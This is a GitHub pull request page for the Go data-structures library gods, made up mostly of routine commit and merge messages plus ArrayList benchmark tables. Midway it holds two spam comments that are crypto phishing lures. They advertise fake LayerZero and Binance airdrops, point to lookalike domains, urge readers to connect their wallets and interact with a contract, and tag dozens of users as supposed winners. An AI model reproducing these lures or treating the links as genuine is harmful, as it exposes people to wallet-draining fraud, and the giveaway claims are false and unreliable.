Iterators and Enumarables

emirpasic opened the pull request.

emirpasic committed:
- update readme about contributions (should go into development)

emirpasic committed:
Merge pull request #42 from RichardHightower/master

TimeComparator

emirpasic committed:
- time comparator fmt and documentation update

emirpasic committed:
Merge pull request #48 from emirpasic/development

Development

emirpasic committed:
- time comparator fmt and documentation update

emirpasic committed:
Merge pull request #47 from spewspews/master

Add AVL trees

emirpasic committed:
- move license of avl tree to root's license

emirpasic committed:
- fix import path

emirpasic committed:
- revert some of changes coming from avl tree merge

emirpasic committed:
- update read me on merge branch (leave master, author can always change the target branch to something else before merging into master)

emirpasic committed:
- go fmt/vet

emirpasic committed:
- remove logging and panics from avl tree

emirpasic committed:
- simplify avl tree by exposing its comparator , i.e. del getter for comparator

emirpasic committed:
- avl tree: expose children and parent nodes, can be useful when extending structure to have access to these

emirpasic committed:
- remove copy-constructor like initialization in avl tree, could be ambiguous for clients of what the output might be. an explicit initialization with explicit comparator is a lot more obvious, more code, but more obvious.

emirpasic committed:
- getting rid of min/max from avl tree for now, until we figure out if these should be implemented on all trees (probably, yes)

emirpasic committed:
- AVL tree, remove dynamic func initialization within a func, simply extract those put/remove func on its own

emirpasic committed:
- avl tree: reshuffle functions around to resemble the red-black tree ordering of functions (makes it easier to maintain code of various trees)

emirpasic committed:
- mimicking iterator behavior as with red-black tree (copied/pasted same test from red-black tree and fixed the iterator logic)

emirpasic committed:
- flip the output of avl tree (swap left with right children in output to mimick the output given by red-black tree)

emirpasic committed:
- avl tree documentation and example

emirpasic committed:
Merge pull request #51 from emirpasic/development

Development

emirpasic committed:
- Fix doubly linked list's element's prev pointer when inserting

emirpasic committed:
Merge pull request #52 from emirpasic/development

Fix doubly linked list's element's previous pointer when inserting

emirpasic committed:
- JSON serialization for all lists

emirpasic committed:
- JSON serialization for all lists (test for singly linked list)

emirpasic committed:
- JSON serialization for all sets

emirpasic committed:
- ToString function to convert to string from any type

emirpasic committed:
- hash map (de)serialization

emirpasic committed:
- all stacks (de)serialization

emirpasic committed:
- hash bidi map (de)serialization

emirpasic committed:
- all trees (de)serialization

emirpasic committed:
- tree-map and tree-bidi-map (de)serialization

emirpasic committed:
- serialization example

emirpasic committed:
- update documentation on serialization

emirpasic committed:
- update documentation on serialization

emirpasic committed:
Merge pull request #53 from emirpasic/json

JSON serialization (marshaling) / deserialization (unmarshaling)

Commit:
speed up redblack put performance

emirpasic committed:
Merge pull request #56 from spewspews/fastredblack

speed up redblack put performance

emirpasic committed:
Update enumerable.go

emirpasic committed:
Update README.md

emirpasic committed:
Update README.md

Spriithy committed:
Added bulk constructors for arraylists & (doubly)-linked-lists

eugecm committed:
replaced ^\s for ^<tab> in code examples

emirpasic committed:
Merge pull request #64 from eugecm/fix_inconsistent_use_of_tabs_spaces

Fixed inconsistent use of tabs and spaces in README.md examples

dvrkps committed:
travis: update go versions

emirpasic committed:
Merge pull request #65 from dvrkps/patch-1

travis: update go versions

mahadevTW committed:
Add IndexOf method to ArrayList

mahadevTW committed:
Add IndexOf method to SinglyLinkedList

mahadevTW committed:
Add IndexOf method to DoublyLinkedList

emirpasic committed:
Merge pull request #69 from mahadevTW/indexOfMethod

Index of method

xtutu committed:
optimize array list

whilei committed:
all: gofmt

Run standard gofmt command on project root.

- go version go1.10.3 darwin/amd64

Signed-off-by: ia <isaac.ardis@gmail.com>

emirpasic committed:
Merge pull request #78 from whilei/gofmt-2018-Jun-17-00-39

gofmt

emirpasic committed:
Revert "gofmt"

emirpasic committed:
Merge pull request #79 from emirpasic/revert-78-gofmt-2018-Jun-17-00-39

Revert "gofmt"

emirpasic committed:
Revert "Revert "gofmt""

emirpasic committed:
Merge pull request #80 from emirpasic/revert-79-revert-78-gofmt-2018-Jun-17-00-39

Revert "Revert "gofmt""

meal committed:
Update README.md

fix example on how to deserialize key-value JSON

Commit:
Add Floor and Ceiling method to Treemap

emirpasic committed:
Merge pull request #81 from meal/readme-update-JSONDeserialization

Update README.md

emirpasic committed:
Merge pull request #76 from xtutu/master

optimize array list

emirpasic committed:
fmt

emirpasic committed:
- update documentation, closes #73

bminer committed:
Added `Set(index, value)` method to all Lists (closes #86)
Added tests

emirpasic committed:
Merge pull request #87 from bminer/master

Added `Set(index, value)` method to all Lists (closes #86)

emirpasic committed:
- update documentation and comments

emirpasic committed:
- fix https://github.com/emirpasic/gods/issues/85

emirpasic committed:
Merge pull request #61 from Spriithy/feature/list_constructors

Added bulk constructors for arraylists & (doubly)-linked-lists

emirpasic committed:
- bulk initialization for lists

emirpasic committed:
Merge pull request #88 from emirpasic/development

List bulk initialization

emirpasic committed:
- fix comments

emirpasic committed:
- fix treeset iterator Last() function

emirpasic committed:
- linkedhashset implementation + iterator + serialization + tests + example + enumerable + documentation

emirpasic committed:
Merge pull request #89 from emirpasic/development

LinkedHashSet

emirpasic committed:
Add LinkedHashSet documentation

emirpasic committed:
Sets bulk intialization

emirpasic committed:
Merge pull request #90 from emirpasic/development

Sets bulk initialization

emirpasic committed:
- update comments and documentation

emirpasic committed:
- linkedhashset simplification

emirpasic committed:
- fix comments/documentation, rigorous serialization testing

emirpasic committed:
- linked hash map core implementation + iterator + enumerable + tests + serialization (TODO: examples + documentation)

emirpasic committed:
- linked hashmap documentation and example

emirpasic committed:
Merge pull request #91 from emirpasic/development

LinkedHashMap

emirpasic committed:
Merge pull request #82 from loxp/master

Add Floor and Ceiling method to Treemap

emirpasic committed:
TreeMap Floor and Ceiling functions

emirpasic committed:
Merge pull request #92 from emirpasic/development

 TreeMap Floor and Ceiling functions

HaraldNordgren committed:
Bump Travis versions

emirpasic committed:
Merge pull request #94 from HaraldNordgren/go_versions

Bump Travis versions

quasilyte committed:
utils: remove excessive type assertions

Assign type switch variable to get properly-typed value
inside case clauses.

Signed-off-by: Iskander Sharipov <quasilyte@gmail.com>

emirpasic committed:
Merge pull request #100 from Quasilyte/patch-1

utils: remove excessive type assertions

own2pwn committed:
typo fix

Commit:
fix linkedhashmap.Map comment error

In linkedhashmap.go there is a line of comment saying "Map holds the elements in a red-black tree", which is not true. The linkedhashmap holds it's elements in a regular hash table, and uses doubly-linked list to store key ordering.

emirpasic committed:
Merge pull request #108 from navigaid/patch-1

fix linkedhashmap.Map comment error

emirpasic committed:
Merge pull request #104 from own2pwn/patch-1

typo fix

emirpasic committed:
Update .travis.yml

mrvon committed:
README: fix BTree commit

emirpasic committed:
Merge pull request #114 from mrvon/master

README: fix BTree commit

stevegt committed:
rename sort example to godsort

Closes #123.

emirpasic committed:
Merge pull request #124 from stevegt/godsort

rename sort example to godsort to prevent conflict with UNIX 'sort'

Commit:
- fix utils test

Commit:
- fix arraylist test

Commit:
I modified Prev and Next Because it uses Compare function.

emirpasic committed:
Add 1.13 and 1.14 versions to tests

emirpasic committed:
Merge pull request #134 from mimiasd/fix-test

- fix some unit test

Commit:
Create an iterator at a specific node

emirpasic committed:
Merge pull request #139 from ably-forks/feature/iterator-at

Create a redblacktree iterator at a specific node

jmdacruz committed:
Simple implementation of set intersection

jmdacruz committed:
Adding Intersection function to the Set interface

nagesh4193 committed:
Added Power Support ppc64le

nagesh4193 committed:
Added Power Support ppc64le

nagesh4193 committed:
Added Power Support ppc64le

emirpasic committed:
Merge pull request #147 from nagesh4193/master

Added Power Support ppc64le

Commit:
Add queue interface

Commit:
Add arrayqueue

Commit:
Add linkedlistqueue

Commit:
Add queue to README

AryanAhadinia committed:
Update README.md

yvvlee committed:
Implements json.Marshaler and json.Unmarshaler

emirpasic committed:
Update travis to latest golang versions

emirpasic committed:
Add .circleci/config.yml

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switching to CircleCI

emirpasic committed:
Switch to CircleCI

emirpasic committed:
Merge pull request #187 from emirpasic/circleci-project-setup

Switch from Travis to CircleCI

emirpasic committed:
Merge pull request #188 from emirpasic/development

Switch to CircleCI

emirpasic committed:
Update license badge

emirpasic committed:
Implement NextTo and PrevTo for all iterators and containers (index or key, forward-only or reversable)

emirpasic committed:
Merge pull request #189 from emirpasic/iterator-features

Implement NextTo and PrevTo on iterator

emirpasic committed:
Merge pull request #190 from emirpasic/development

Development

emirpasic committed:
Implement GetNode() for BTree AVLTree and RedBlackTree and Node() function for their iterators

emirpasic committed:
Merge pull request #191 from emirpasic/tree-iterator-node

Implement GetNode() for trees and Node() function for their iterators

emirpasic committed:
Merge branch 'development'

emirpasic committed:
Merge pull request #165 from yvvlee/feature/implements_jsonMarshaler_and_Unmarshaler

Implements json.Marshaler and json.Unmarshaler interfaces

emirpasic committed:
Implements json.Marshaler and json.Unmarshaler interfaces

emirpasic committed:
Merge pull request #192 from emirpasic/json-interfaces

Implements json.Marshaler and json.Unmarshaler interfaces

emirpasic committed:
Merge branch 'development'

emirpasic committed:
Merge pull request #135 from doshiraki/origin/modifyRBTree

I modified Prev and Next Because it uses Compare function.

emirpasic committed:
Merge branch 'development'

emirpasic committed:
Simplify ToString function for types (avoid unnecessary casting)

emirpasic committed:
Enforce String() inteface on Container

emirpasic committed:
Merge branch 'development'

emirpasic committed:
Update documentation on JSON serialization with the new json/encoding interface implementation

emirpasic committed:
Update documentation on JSON serialization with the new json/encoding interface implementation

emirpasic committed:
Merge pull request #142 from jmdacruz/implement-set-intersection

Simple implementation of set intersection

emirpasic committed:
Update README

emirpasic committed:
Set operations: intersection, union, difference

emirpasic committed:
Fix lint errors

emirpasic committed:
Merge pull request #195 from emirpasic/development

Set operations: intersection, union, difference

emirpasic committed:
codeconv integration

emirpasic committed:
codeconv integration

emirpasic committed:
codeconv integration

emirpasic committed:
codeconv integration

emirpasic committed:
Merge pull request #196 from emirpasic/development

Code Coverage Report with Badge

emirpasic committed:
Comparator tests

emirpasic committed:
Interface implementation assertions moved outside the functions

emirpasic committed:
Improve code coverage

emirpasic committed:
Merge pull request #197 from emirpasic/development

Improve code coverage

emirpasic committed:
Integrate sourcegraph badge

emirpasic committed:
Add release badge

emirpasic committed:
Create dependabot.yml

emirpasic committed:
Create codeql-analysis.yml

emirpasic committed:
Create sonarcloud.yml

emirpasic committed:
SonarQube fixes

emirpasic committed:
SonarQube badge

emirpasic committed:
SonarQube

emirpasic committed:
Merge pull request #200 from emirpasic/development

SonarQube

emirpasic committed:
tmp

emirpasic committed:
SonarQube

emirpasic committed:
Merge pull request #201 from emirpasic/development

SonarQube

emirpasic committed:
Merge pull request #148 from AryanAhadinia/issue_146

Add Queue

emirpasic committed:
Add String() to comments for all structures

emirpasic committed:
Implements queues, LinkedListQueue and ArrayQueue

emirpasic committed:
Documentation fix

emirpasic committed:
Merge pull request #202 from emirpasic/development

Implements queues, LinkedListQueue and ArrayQueue

emirpasic committed:
Implements CircularBuffer

emirpasic committed:
circualbuffer example

emirpasic committed:
Fix circular buffer tests

emirpasic committed:
Fix iterator in binary heap

emirpasic committed:
Implements PriorityQueue

emirpasic committed:
Implements PriorityQueue

emirpasic committed:
Merge pull request #203 from emirpasic/development

Implements PriorityQueue and CircularBuffer

emirpasic committed:
Testing funding.yml

emirpasic committed:
Fix in ArrayList.Contains function against nil values

emirpasic committed:
Merge pull request #205 from emirpasic/development

Fix in ArrayList.Contains function against nil values

rakiyoshi committed:
fix documentation

emirpasic committed:
Merge pull request #213 from rakiyoshi/fix-doc

Fix documentation

ugurcsen committed:
Benchmark bug fixed(interface conversion).

go test -run=NO_TEST -bench . -benchmem -benchtime 1s
This command gives an error (panic: interface conversion: interface {} is int, not priorityqueue.Element) and to fix this enqueue(n)s changed to enqueu(Element{})s.

emirpasic committed:
Merge pull request #220 from ugurcsen/patch-1

Benchmark bug fixed(interface conversion).

thebenkogan committed:
fix: doublylinkedlist insertion with last to first traversal

emirpasic committed:
Merge pull request #227 from thebenkogan/master

fix: doublylinkedlist insertion with last to first traversal

rado-softi commented:
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

arconejeros commented:
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @nirbhay24, @astrotars, @ruvr, @vogonyo, @TC94615, @wufniks, @norand94, @paranoidandroid81, @dnx2k, @jeremi, @rwbaumg, @davidleitw, @Kethylar, @jeffreybreen, @ksanderer, @MParvin, @bitqiu, @rogersole, @tylorzhou, @akalinin5, @MitchellCash, @cumbreras, @cesc1802, @jooddang, @viniaero, @israelkeys, @citrus09, @kevineen, @lbroot, @drZloy, @koradiyakaushal, @faghani, @agustinottobre, @makediff, @gzengm, @R-K-H, @denizumutdereli, @Axu1g, @seii-saintway, @duringnone, @goliatone, @thomasjoyce, @SPIRY-RO, @arden, @kecheon, @vz1en, @vincentserpoul, @wingoo, @fly51fly, @svirmi

PapaCharlie committed:
Generics migration (#237)

* Generics migration

This attempts to migrate this library in the least invasive way by preserving as
much of the original API as possible. It does not change the tests in a
meaningful way nor does it attempt to upgrade any logic that can be simplified
or improved with generics. This is purely an API migration, and still requires a
lot of additional work to be fully ready.

* Fix a few broken tests around serialization

* Add v2 suffix

* Temporarily change mod name for testing

* Rename module to /v2

ksw2000 committed:
Improved ArrayList performance by removing `size` field. (#255)

* Improved ArrayList performance by removing `size` field.

Removed the `size` field from the `List` struct and replaced it with the built-in Go slice length implementation.
+ Achieved an average reduction of nearly 40% in execution time for `ArrayListGet`.
+ Achieved an average reduction of nearly 23% in memory usage for `ArrayListAdd`.
+ However, this change slightly increased the execution time for `ArrayListAdd` by 2.7%.
```
goos: linux
goarch: amd64
pkg: github.com/emirpasic/gods/v2/lists/arraylist
cpu: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
                        │   old.txt   │               new.txt               │
                        │   sec/op    │   sec/op     vs base                │
ArrayListGet100-8         51.20n ± 0%   32.49n ± 0%  -36.53% (n=50)
ArrayListGet1000-8        447.5n ± 0%   270.3n ± 1%  -39.60% (n=50)
ArrayListGet10000-8       4.418µ ± 1%   2.540µ ± 0%  -42.52% (n=50)
ArrayListGet100000-8      44.06µ ± 0%   25.15µ ± 0%  -42.91% (n=50)
ArrayListAdd100-8         726.5n ± 1%   760.5n ± 0%   +4.69% (p=0.000 n=50)
ArrayListAdd1000-8        7.437µ ± 2%   7.389µ ± 1%        ~ (p=0.746 n=50)
ArrayListAdd10000-8       70.06µ ± 1%   74.34µ ± 1%   +6.11% (p=0.000 n=50)
ArrayListAdd100000-8      740.2µ ± 1%   728.9µ ± 2%        ~ (p=0.147 n=50)
ArrayListRemove100-8      233.8n ± 0%   233.9n ± 0%        ~ (p=0.162 n=50)
ArrayListRemove1000-8     2.275µ ± 0%   2.276µ ± 0%        ~ (p=0.452 n=50)
ArrayListRemove10000-8    22.75µ ± 0%   22.75µ ± 0%        ~ (p=0.956 n=50)
ArrayListRemove100000-8   1.323m ± 1%   1.331m ± 1%        ~ (p=0.120 n=50)
geomean                   7.218µ        6.119µ       -15.22%

                        │    old.txt     │                 new.txt                 │
                        │      B/op      │     B/op       vs base                  │
ArrayListGet100-8           0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListGet1000-8          0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListGet10000-8         0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListGet100000-8        0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListAdd100-8         2.987Ki ± 0%     2.087Ki ±  1%  -30.14% (n=50)
ArrayListAdd1000-8        27.50Ki ± 1%     23.31Ki ±  2%  -15.24% (p=0.000 n=50)
ArrayListAdd10000-8       293.9Ki ± 1%     204.7Ki ±  1%  -30.36% (n=50)
ArrayListAdd100000-8      2.667Mi ± 1%     2.244Mi ± 12%  -15.86% (p=0.000 n=50)
ArrayListRemove100-8        0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListRemove1000-8       0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListRemove10000-8      0.000 ± 0%       0.000 ±  0%        ~ (p=1.000 n=50) ¹
ArrayListRemove100000-8     453.5 ± 1%       457.5 ±  1%        ~ (p=0.059 n=50)
geomean                                ²                   -8.38%                ²
¹ all samples are equal
² summaries must be >0 to compute geomean

                        │   old.txt    │               new.txt               │
                        │  allocs/op   │ allocs/op   vs base                 │
ArrayListGet100-8         0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListGet1000-8        0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListGet10000-8       0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListGet100000-8      0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListAdd100-8         0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListAdd1000-8        0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListAdd10000-8       0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListAdd100000-8      0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListRemove100-8      0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListRemove1000-8     0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListRemove10000-8    0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
ArrayListRemove100000-8   0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=50) ¹
geomean                              ²               +0.00%                ²
¹ all samples are equal
² summaries must be >0 to compute geomean
```

* Improve ArrayList Remove() by `slices.Delete`

The performance of `slices.Delete()` is better
```
goos: linux
goarch: amd64
pkg: github.com/emirpasic/gods/v2/lists/arraylist
cpu: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
                        │ old-remove.txt │           new-remove.txt            │
                        │     sec/op     │   sec/op     vs base                │
ArrayListRemove100-8         234.2n ± 1%   211.2n ± 2%   -9.82% (p=0.000 n=10)
ArrayListRemove1000-8        2.293µ ± 1%   2.063µ ± 4%  -10.05% (p=0.000 n=10)
ArrayListRemove10000-8       22.78µ ± 1%   20.53µ ± 2%   -9.86% (p=0.000 n=10)
ArrayListRemove100000-8      1.318m ± 3%   1.279m ± 2%   -2.96% (p=0.019 n=10)
geomean                      11.27µ        10.34µ        -8.22%

                        │ old-remove.txt │           new-remove.txt            │
                        │      B/op      │    B/op     vs base                 │
ArrayListRemove100-8        0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove1000-8       0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove10000-8      0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove100000-8     452.0 ± 4%     444.5 ± 1%       ~ (p=0.224 n=10)
geomean                                ²               -0.42%                ²
¹ all samples are equal
² summaries must be >0 to compute geomean

                        │ old-remove.txt │           new-remove.txt            │
                        │   allocs/op    │ allocs/op   vs base                 │
ArrayListRemove100-8        0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove1000-8       0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove10000-8      0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
ArrayListRemove100000-8     0.000 ± 0%     0.000 ± 0%       ~ (p=1.000 n=10) ¹
geomean                                ²               +0.00%                ²
¹ all samples are equal
² summaries must be >0 to compute geomean
```

* Improve ArrayList Clear() by using built-in clear() instead of creating a new one

* Refactor code by `slices` package.

* Refactor ArrayList Insert() by `slices.Insert()`

emirpasic committed:
Delete .github/FUNDING.yml

emirpasic committed:
Update config.yml

emirpasic committed:
Updated config.yml

emirpasic committed:
Updated config.yml

emirpasic committed:
Update config.yml

xBlaz3kx committed:
Typo fix

xBlaz3kx committed:
Typo fix

emirpasic committed:
Merge pull request #278 from xBlaz3kx/fix/typo

fix: comment typo(s)
